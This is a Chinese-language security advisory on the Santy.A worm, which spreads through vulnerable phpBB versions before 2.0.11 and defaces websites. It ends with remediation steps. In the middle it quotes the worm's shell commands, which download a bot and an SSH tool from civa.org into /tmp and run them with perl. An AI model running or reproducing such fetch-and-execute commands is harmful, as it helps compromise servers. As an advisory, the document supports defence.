Santy.A 是一種蠕蟲,它會對運行有漏洞的 phpBB 2.x 並且是 2.0.11 之前版本的網頁伺服器進行傳播。它只會感染網頁伺服器,一般家用或工作站的電腦則不受影響。
蠕蟲利用 Google 搜尋引擎建立一個簡單的查詢去找出運行 php 的網頁伺服器。當每次找到目標伺服器,便會嘗試攻擊處理特殊參數上的漏洞,繼而安裝蠕蟲複本到這台伺服器。若攻擊成功,蠕蟲會複製自己到這台伺服器和覆寫以下延伸類別的所有檔案: .asp, .htm, .jsp, .php, .phtm, .shtm。 它會將受影響的網站內容更改為以下信息:
This site is defaced!!!
NeverEverNoSanity WebWorm generation X*
(*X 是受感染數目,會隨著新的感染而自動更新。)
以下是從 Google 搜尋出被病毒入侵的網站 (數量真多,大約有 37,000):
http://www.google.com/search?hl= ... +site+is+defaced%22
Google 已實施攔截管制由 Santy.A 製造的查詢請求,預期會大大減弱蠕蟲的傳播能力,降低繼續感染的風險。
病毒會不停執行:
wget civa.org/pdf/bot
wget civa.org/pdf/ssh.a
sh -c echo _START_; cd /tmp;wget civa.org/pdf/bot;perl bot;wget civa.org/pdf/ssh.a;p
httpd -DSSL
佔用伺服器資源:
5023 named 25 0 3044 3044 2180 S 32.3 0.1 1:17 0 named
5836 apache 25 0 3644 3644 1796 R 23.9 0.1 0:30 0 perl
5732 apache 25 0 3644 3644 1796 R 22.7 0.1 2:14 0 perl
5876 apache 25 0 3640 3640 1796 R 20.3 0.1 0:02 0 perl
病毒會不停產生:”m1ho2of ” 這個檔案。
解決方案
更新病毒防護軟件的病毒清單,並用病毒防護軟件去偵測和清除此病毒。
注意:請根據防毒軟件公司的指引來清除病毒和修復系統。
由於這蠕蟲利用 phpBB 的漏洞來感染系統,請升級至 phpBB 2.0.11 版本去避免受攻擊。
請在這裡下載最新的 phpBB 程式,立即更新。
http://sourceforge.net/project/showfiles.php?group_id=7885
在 /tmp 的 directory 中會發現很多病毒的檔案,必須立刻刪除。
搜尋 \’m1ho2of\’ 檔案,立刻刪除。
